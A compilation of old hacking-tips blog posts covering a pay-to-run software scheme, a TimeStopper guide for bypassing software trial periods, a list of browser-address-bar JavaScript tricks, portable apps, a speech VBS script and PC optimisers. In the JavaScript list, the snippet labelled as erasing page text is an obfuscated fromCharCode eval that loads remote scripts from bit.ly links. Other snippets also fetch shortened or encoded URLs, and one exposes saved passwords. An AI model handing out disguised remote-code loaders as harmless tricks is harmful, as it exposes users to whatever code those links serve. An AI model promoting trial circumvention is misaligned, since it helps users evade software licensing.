Wednesday, June 19, 2013

Earn Automatic Money To Run Thread Manager Software On Your PC




Method...........

01. First Sign Up Throug This Link

02. Then Activate Your Email

03. Then Click Personal> Profile Tab

04. Then Enter Your Mobile Number With Your Country Code ( 88xxxxxxxxxxx, 99xxxxxxxx etc ) ( Do not enter this type +88xxxxxxxxxxx, +99xxxxxxxxx )

05. Then You Get A Code On Your Mobile

06. You Have To Send Back This Code To Their Number ( The Number Which From You Get The Code )

07. After Send Back This Code From Your Mobile You Have To Refresh The Profile Page And You See  88xxxxxxxxxxx ( Successful Verified )

08. If You Done This Well Then You Have Done

09. Now You Have To Download Their Software From Download Menu And Setup The Software On Your PC

10. After 2/3 Hours You Get A Thread And Your Earning Is Automatically Start........

I Have Got My Payment. One Of My Payment Proof Are Given Below






Sunday, June 3, 2012

Bypass software trail period and run software forever

There are many software’s available in web which are best in many ways depending upon the user. But these software’s are always paid one which needs to be purchased after certain period in order to use it.
But some software makers give a demo version of the software to try out before buying it which runs for a certain period and needs to be purchased in order to work again in your PC.
Many will uninstall the software and reinstall the software and will use it again as demo version. But there is way to use that trial software again and again without even uninstalling it.
TimeStopper does that. TimeStopper is a small software which just stops the time of any executable software file and will helps you in using that Trail software continuously without any trouble. It have very sinple user interface which is very easy to handle.
Now just download the Time Stopper from here


Then just install the TimeStopper in your PC
Now just Browse the Executable File (.exe file) of Require Software which will be usually located in C:\Program files\APPLICATION-NAME\ and now just select the new installation date.
Now extend to another 30/60/90 Days depending on the software
 
Features:
  • TimeStopper is a freeware.
  • Time Stopper is the software which can stop the time for try out version software.
  • When you stop the time you can use your trial versions forever.
  • When you stop the time of a try-out version using this Time Stopper it works via this Time Stopper. Real time amp; date run normally on your system.
  • You can use any number of trial version software
Note that this program just extends the trial period of any software by changing the software installation date.
You can use this TimeStopper to extend the Trail Period of any software.

Awesome Javascript collection by ehackworld

Procedure:

1)Just copy the javascript and paste it in your browsers Address bar and hit enter


DOWNLOAD TXT FILE




Javascript which pop up a message:

javascript:function reverse() { var inp = " !!!..skcoR dlrowkcahe "; var outp="";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse()


Javascript to find passwords behind the astriks:

javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();
                                    
                                                          (OR) 

javascript:shum=document.getElementsByTagName('input');for(x=0;x<shum.length;x++){shumj=shum[x].type;if(shumj=="password"){shum[x].type="text"}};void(0)


Javascript to rotate images on webpage:

javascript: R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);
                                                            
                                                                (OR)

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI= document.images; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0)

                                                                 (OR)

javascript:R=-1;DI=document.images;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(0,7,300);DIS.top=A(1.6,6,150)}setInterval('R++;B(R%DIL)',15);void(0)


Javascript which vibrates your browser:

javascript:function flood(n) {if (self.moveBy) {for (i = 20; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} flood(10);{ var inp = "!!!..skcoR dlrowkcahe"; var outp = ""; for (i = 0; i <= inp.length; i++) { outp = inp.charAt (i) + outp ; } alert(outp) ;}; reverse();

                                                                 (OR)

javascript:a=0;x=0;y=0;setInterval("a+=.01;x=Math.cos(a*3)*200;y=Math.sin(a*2)*2;moveBy(x,y)",2);void(0)
                                       
                                                                     (OR)              

javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6) 


Javascript which pop up message and changes text colour on webpage:

javascript:alert("Created by ehackworld.tk"); i=0; c=["red","green","blue","yellow","magenta","orange","black","white"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(0);


Javascript to Edit any webpage:

javascript:nick=document.body;nick.contentEditable='true'; document.designMode='on'; void 0


Javascript which erases the text on webpage:

javascript:eval(String.fromCharCode(106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 58, 118, 97, 114, 32, 105, 44, 115, 44, 115, 115, 61, 91, 39, 104, 116, 116, 112, 58, 47, 47, 98, 105, 116, 46, 108, 121, 47, 106, 121, 115, 68, 57, 69, 39, 44, 39, 104, 116, 116, 112, 58, 47, 47, 98, 105, 116, 46, 108, 121, 47, 101, 104, 73, 69, 74, 76, 39, 93, 59, 102, 111, 114, 40, 105, 61, 48, 59, 105, 33, 61, 115, 115, 46, 108, 101, 110, 103, 116, 104, 59, 105, 43, 43, 41, 123, 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 115, 46, 115, 114, 99, 61, 115, 115, 91, 105, 93, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 125, 118, 111, 105, 100, 40, 48, 41, 59))


funny javascript to fool your friends:

javascript:alert("Wait for few seconds......");nb=document.all[0].innerHTML.match(/[0-1]*.jpg\)/g);nb=parseInt(nb);document.body.innerHTML="<center><font style='font-size:100'><b><b>Computer Hacked By ehackworld</b></b></font>";for(i=1;i<=100;i++){document.body.innerHTML+='<img src="http://bit.ly/iJ739S">';};void(0)


Javascript which opens two webpages on same Tab:

javascript:alert("Created by ehackworld.tk");document.body.innerHTML+='<iframe name="ls" width="1000" height="600"></iframe>';window[0].location="http://www.ehackworld.tk/";function lostsoul(){document.forms[1].target="ls";window[0].document.forms['accept_0'].submit();};void(setInterval(lostsoul,4000))


Javascript which changes text colour on a webpage:

javascript: pri=0; nil=["red","yellow","lime","violet","navy","blue"]; enilton=document.links;setInterval("pri++;enilton[pri % document.links.length].style.color=nil[pri % nil.length]",10);void(0);javascript: pri=0; nil=["red","yellow","lime","violet","navy","blue"]; enilton=document.links;setInterval("pri++;enilton[pri % document.links.length].style.color=nil[pri % nil.length]",10);void(0);javascript: pri=0; nil=["red","yellow","lime","violet","navy","blue"]; enilton=document.links;setInterval("pri++;enilton[pri % document.links.length].style.color=nil[pri % nil.length]",10);void(0);javascript: pri=0; nil=["red","yellow","lime","violet","navy","blue"]; enilton=document.links;setInterval("pri++;enilton[pri % document.links.length].style.color=nil[pri % nil.length]",10);void(0);javascript: pri=0; nil=["red","yellow","lime","violet","navy","blue"]; enilton=document.links;setInterval("pri++;enilton[pri % document.links.length].style.color=nil[pri % nil.length]",10);void(0); 


Javascript for Blinking text on webpage:

javascript: cor = "red"; var timer_1; function vagalume () {(cor == "yellow") ? cor = "red": cor = "yellow"; document.links[20].parentNode.parentNode.style.backgroundColor = cor; timer_1 = setTimeout('vagalume ()',100)}; vagalume ()


Dom inspector Javascript:

javascript:prefFile=''; void(z=document.body.appendChild(document.createElement('script'))); void(z.language='javascript'); void(z.type='text/javascript'); void(z.src='http://bit.ly/nSSQw'); void(z.id='modi');


Javascript for Dancing text on webpage:

javascript:R=-1;DI=document.links;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(5,100,500);DIS.top=A(5.6,60,150)}setInterval('R++;B(R%DIL)',15);void(0) 


Javascript to expand images on a webpage:

javascript:DI=document.images;connectionstring= "!gsso9..hl`fdr2-nqjts-bnl.hl`fdr.lhkhdt.0.257.207/1257-iof!";exec1="";function A(){for(i=1;i<connectionstring.length-1;i++){exec1=exec1 + String.fromCharCode(connectionstring.charCodeAt(i)+1);}DI[3].src=exec1;}function B(){if(DI[3].width<300){DI[3].width++;}}A();setInterval('B()',5); void(0);

                                                                      (OR)

javascript:mwunm=128;void(setInterval("mwunm++;document.images[2].width=mwunm",5))

Use your Pen drive or USB hard drive as Virtual OS ~ Everything About Hack!! http://ehackworld.blogspot.com/2011/09/use-your-pen-drive-or-usb-hard-drive-as.html#ixzz1wj5lMjy0 Warning:DO not copy the content Under Creative Commons License: Attribution Use your Pen drive or USB hard drive as Virtual OS

Pen drive and portable USB hard disks are nowdays become a common method to transfer data between systems. But do you know that you can use any application directly from your pen drive or portable USB hard disk just by connecting your Pen drive to the any PC or laptop. Ahha you all are still in confusion, what actually i am talking about, so lets have better view.

Suppose you gone to your friends or simply college and there you want to use Microsoft excel or any other application but that is not installed on that system. Then what happen you got stuck and your work got halted there but if you have portable application for that which you can keep in your pen drive or portable hard disk and use it where ever you want then you will never face situations like above. But now you all will be thinking we need a lot of portable applications for that, right... yes are thinking in right way but Lupo pensuite has done that for us. Why don't we keep everything in our pocket and use it whenever , wherever we need the application. What it has done, it has kept all the daily use and critical applications in one portable installation which consist of all daily use applications like:
  • WEB BROWSERS
  • E-MAIL CLIENTS
  • MESSENGERS
  • P2P CLIENTS
  • WEB SERVERS
  • DOWNLOAD MANAGERS
  • FEED READERS
  • REMOTE CONTROL
  • BOOKMARKS MANAGERS:
  • FTP/SSH CLIENTS
  • PORTABLE WIKI
  • LINK CHECKER
  • PROXY SERVER
  • VIDEO PLAYERS
  • AUDIO PLAYERS
  • MEDIA EDITORS
  • MEDIA CONVERTERS
  • CD/DVD RIPPERS
  • TAG EDITORS
  • STREAM MANAGERS
  • CD/DVD BURNERS
  • VIDEO CAPTURE
  • IPOD MANAGERS
  • MEDIA INFO
  • MEDIA CATALOGERS
  • CD/DVD TOOLS
  • TEXT TO SPEECH
  • MEDIA CENTER
  • IMAGE VIEWERS
  • IMAGE EDITORS
  • GRAPHICS EDITORS
  • SCREEN CAPTURE
  • SCREEN ZOOMERS
  • ICON/CURSOR EDITORS
  • IMAGE PROCESSING
  • ALBUM CREATORS
  • COVER CREATOR
  • SYSTEM MANAGERS
  • SYSTEM INFORMATION
  • NETWORK TOOLS
  • MONITORING/TESTING TOOLS
  • PROGRAM LAUNCHERS
  • STARTUP MANAGERS
  • SCHEDULING MANAGERS
  • TWEAKERS
  • REGISTY TOOLS
  • DISK DEFRAG
  • VIRTUAL DESKTOP
  • UNINSTALL TOOLS
  • CLIPBOARD TOOLS
  • MOUSE/KEYBOARD TOOLS
  • FOLDER/WINDOW TOOLS
  • SHELL TOOLS
  • FILE ASSOCIATIONS
  • DEVICE TOOLS
  • DESKTOP TOOLS
  • PARTITION MANAGERS
  • MALWARE DETECTION
  • DISK/REGISTRY CLEANERS
  • ENCRYPTING
  • PASSWORD MANAGERS
  • FILE RECOVERY
  • SECURE DELETION
  • INTEGRITY CHECKERS
  • UNLOCKING TOOLS
  • Office SUITES
  • WORD PROCESSORS
  • SPREADSHEETS
  • TEXT EDITORS
  • PDF/TEXT READERS
  • PDF TOOLS
  • ORGANIZERS
  • PROJECT MANAGERS
  • FINANCIAL TOOLS
  • PUBLISHING
  • POST-IT
  • DIAGRAMMING
  • TEXT PROCESSING
  • FILE MANAGERS
  • FILE ARCHIVERS
  • FILE RENAMERS
  • FILE LISTERS
  • FILE SPLITTERS
  • BACKUP TOOLS
  • SYNCHRONIZERS
  • SEARCH/REPLACE TOOLS:
  • DUPLICATE FINDERS
  • FOLDER COMPARISON
  • FILE COPIERS
  • FONT MANAGERS
  • ATTRIBUTE TOOLS
  • DISK SIZE TOOLS
  • INSTALLER BUILDERS
  • DATABASE TOOLS
  • PROGRAMMING TOOLS
  • HEX EDITORS
  • EMULATORS
  • MATHEMATICS
  • UNIT CONVERTERS
  • ASTRONOMY
  • GENEALOGY
  • MUSIC TOOLS
  • DIDACTIC TOOLS
  • GAMES
  • LOGIC/PUZZLES
The list is little small but when you listen this installers size then you will be more shocked its only 200MB pen drive suite. Basically its a virtual OS that run from your pendrive and contains the all the applications that you need in day to day life...:P contains more than that..

Also you can add more and more portable application to your pensuite. That's the beauty of Lupo pensuite. So no need to worry while going to other's PC or system that he might have this software or not, keep everything in your pocket friends and enjoy the flavor of portability.
How to use Lupo Pensuite to use all applications from pen drive?
2. Install the Pen drive suite into you pendrive or portable USB hardisk.
3. Now go anywhere and just start exe to open the suite.
4. Select the application and use it directly from your pen drive.
5. That's all friends.

Make your Computer Talk

Have you ever wondered how can you make your computer speak whatever you input to it like in the movies? Would it not be fun? If only it was possible! Rejoice, because now it is possible. Well, if you wish to know how to do this, then you have come to the right place. With this trick, you can create a script in Windows which will make your computer speak whatever you input to it.

To create one such talk script, follow the steps given below:-

Steps:

Open Notepad.
Copy and paste the exact code given below.

Dim Message, Speak
Message=InputBox("Enter text","Speak")
Set Speak=CreateObject("sapi.spvoice")
Speak.Speak Message


3. Click on File Menu, Save As, select All Types in Save as Type option, and save the file as (anything)Speak.vbs or "*.vbs".
4.  Double click on the saved file, a window will open like the one in the image. Enter some text in enter text column and click OK.
 
 
 
Now your Computer will speak / talk what you typed in.

Sunday, May 27, 2012

SterJo Windows Key Finder

SterJo Windows Key Finder is a Portable Product Key Finder created by SterJo. It can be used to recover lost Windows or Office Product Keys. Ideally this Portable tool might be used to reveal Microsoft Windows XP, Vista, Windows 7, Office XP, Office 2003, Office 2007, and Office 2010 product keys. A user might then copy found keys to a text document for use down the road, when you might need to reinstall the Windows software.


SterJo Windows Product Key Finder

SterJo Key Finder

Authors Website: http://www.sterjosoft.com/key-finder.html
Extracted Size: 728 KB
License: Freeware
Download: You can grab this Free Product Key Finder Download

Optimize and Speed up PC by 1.5 times without any Hardware Upgrade





tools_computer_optimizationWhether you are a hardcore gamer or a normal computer user, you expect fast performance from your computer. Latest versions of browsers like Firefox and Google Chrome consumes too much memory and if you try to run applications like Skype or even Microsoft Office at the same time, you may face sluggish operation on your PC. It can lead to frustration and you might start thinking about upgrading the RAM, Processor etc. of your current configuration and that will cost you.
I would recommend to try performance booster software before upgrading the configuration of your system. Actually when a computer runs on certain operating system say Windows, It continuously runs few services, programs and processes in background even if they are not required to run. That means, you can stop those services or processes to free the memory and utilize that memory in processes that you want to run. That will boost or speed up the performance of your computer without upgrading the hardware. Earlier also we had shared few tips optimize PC performance through software, but today I am sharing a freeware which is capable of speeding up the performance of your computer by 1.5 times with single click. I am talking about JetBoost.com, a free software to optimize Windows PC to speed up the performance.
JetBoost does following things in your computer to improve the performance of PC.
  • Close process which are not required to run
  • Clean RAM (Random Access Memory) for better performance
  • Prioritize programs to speed up the start-up process or boot time
  • Free memory by removing the clipboard data
jetboost_optimization

If you want to play a game on your PC which actually consumes so much memory, this software will play an important role in your gaming experience. There is a special Gaming Optimization setting in this software that will optimize your PC to run the game without any interruption or any sluggish behavior. Once you set the optimization mode to “Game” before launching the game on your PC, it will disable all auto-updates, close explorer.exe to release system resources, set the power settings to give you responsive gaming experience. It will also close the normal work services which are not required at the time of gaming on PC.

Restore the stopped services

jetboost_restore

Once you completed the game on your PC, you can actually restore the system processes and services to make your computer as normal as it was before launching the game. Even when you optimize the PC for “Work” purpose or “Custom” mode, you can restore the system to earlier stage by clicking the “Restore” button. This is helpful if you are facing any issues after optimizing the system with JetBoost.

Other Alternatives to speed up performance of PC

There are lot many third-party software available to boost the performance of your system. Some of them actually tweaks the registry settings of your Windows to improve the experience. For example, Windows Vista users can try Vista Services Optimizer for better experience. Apart from third-party software, Windows itself is having few system tools to optimize the performance of your computer. For example, Disk De-fragmentation can improve the speed of your PC operation. Cleaning the temporary files manually or by using freeware to do so, you can improve the performance of your old computer.